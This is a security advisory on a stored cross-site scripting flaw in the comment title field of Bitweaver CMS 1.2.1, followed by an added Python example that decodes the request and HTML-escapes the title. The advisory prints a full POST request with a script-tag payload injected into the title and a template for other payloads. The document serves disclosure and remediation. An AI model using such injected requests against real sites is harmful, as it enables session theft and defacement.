`Bitweaver CMS 1.2.1 User Comment Title Cross-Site Scripting Vulnerability
####################################
Information of Software:
Software: Bitweaver CMS 1.2.1
Site: http://www.bitweaver.org
Description of software: bitweaver is continually improving its stability,
usability, flexibility and power. The rate at which this is happening is quite
astonishing and bitweaver has come a long way since its birth, just over a year ago.
####################################
Bug:
Bitweaver contains a flaw that allows a remote cross-site scripting attack.
The vulnerability is in the title field of the registered-user comment page: the
user can modify the POST request and insert XSS code into it.
- HTTP POST request -
http://[target]/[path]/read.php?article_id=7#editcomments
POST /articles/read.php?article_id=7 HTTP/1.1
Host: http://[target]
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; it-IT; rv:1.7.12) Gecko/20050919 Firefox/1.0.7
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: it,it-it;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://[target]/articles/read.php?article_id=7
Cookie: mod_usertrack=82.56.164.250.1141558144377994; BWSESSION=v5a6krvki42h0puv48dc5coki0; tz_offset=3600; tiki-user-bitweaver=616706c4d6f7bdf68b30893f860cbb2b
Content-Type: application/x-www-form-urlencoded
Content-Length: 265
tk=c67481b438f7be3da147&comments_maxComments=10&comments_style=threaded&comments_sort_mode=commentDate_desc&post_comment_reply_id=&post_comment_id=&comment_title=hacking&comment_data=[your_name_logged]&post_comment_submit=Post
But we can modify the POST request in this way:
tk=c67481b438f7be3da147&comments_maxComments=10&comments_style=threaded&comments_sort_mode=commentDate_desc&post_comment_reply_id=&post_comment_id=&comment_title=%3Cscript%3Ealert%28%22lol%22%29%3B%3C%2Fscript%3E&comment_data=[your_name_logged]&post_comment_submit=Post
---------------------------------------------------------
Example:
For this exploit you must be registered at the site.
You can insert XSS code in the text of the post, or you can modify the request in this way:
tk=c67481b438f7be3da147&comments_maxComments=10&comments_style=threaded&comments_sort_mode=commentDate_desc&post_comment_reply_id=&post_comment_id=&comment_title=[XSS]&comment_data=[your_name_logged]&post_comment_submit=Post
####################################
Credit:
Author: Kiki
e-mail: [email protected]
web page: http://kiki91.altervista.org
http://blackzero.netsons.org
####################################`
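
Added example, not part of the original advisory and not Bitweaver's own code: it decodes the two form bodies shown above, flags rendered fields that carry HTML metacharacters (useful when reviewing request logs), and shows the title encoded at output time, which is the fix for this class of bug. The function names, the `RENDERED_FIELDS` list and the `<h3>` wrapper are assumptions made for illustration.

```python
import html
from urllib.parse import parse_qs

# Form bodies taken from the advisory above: the normal post and the modified one.
BENIGN_BODY = (
    "tk=c67481b438f7be3da147&comments_maxComments=10&comments_style=threaded"
    "&comments_sort_mode=commentDate_desc&post_comment_reply_id=&post_comment_id="
    "&comment_title=hacking&comment_data=[your_name_logged]&post_comment_submit=Post"
)
MODIFIED_BODY = BENIGN_BODY.replace(
    "comment_title=hacking",
    "comment_title=%3Cscript%3Ealert%28%22lol%22%29%3B%3C%2Fscript%3E",
)

# Assumption: these are the fields that are later written into the HTML page.
RENDERED_FIELDS = ("comment_title", "comment_data")


def parse_form(body):
    """Decode an application/x-www-form-urlencoded body into {field: value}."""
    parsed = parse_qs(body, keep_blank_values=True)
    # If a field is repeated, keep the last value.
    return {name: values[-1] for name, values in parsed.items()}


def fields_with_markup(form):
    """Return the rendered fields whose value contains HTML metacharacters."""
    return [
        name for name in RENDERED_FIELDS
        if name in form and html.escape(form[name], quote=True) != form[name]
    ]


def render_title(form):
    """Hypothetical template step: HTML-encode the title when it is output."""
    title = form.get("comment_title", "")
    return "<h3>" + html.escape(title, quote=True) + "</h3>"


if __name__ == "__main__":
    for label, body in (("benign", BENIGN_BODY), ("modified", MODIFIED_BODY)):
        form = parse_form(body)
        print(label, fields_with_markup(form), render_title(form))
```

Encoding at output is what neutralises the title; the `fields_with_markup` check is only a review aid and does not replace it.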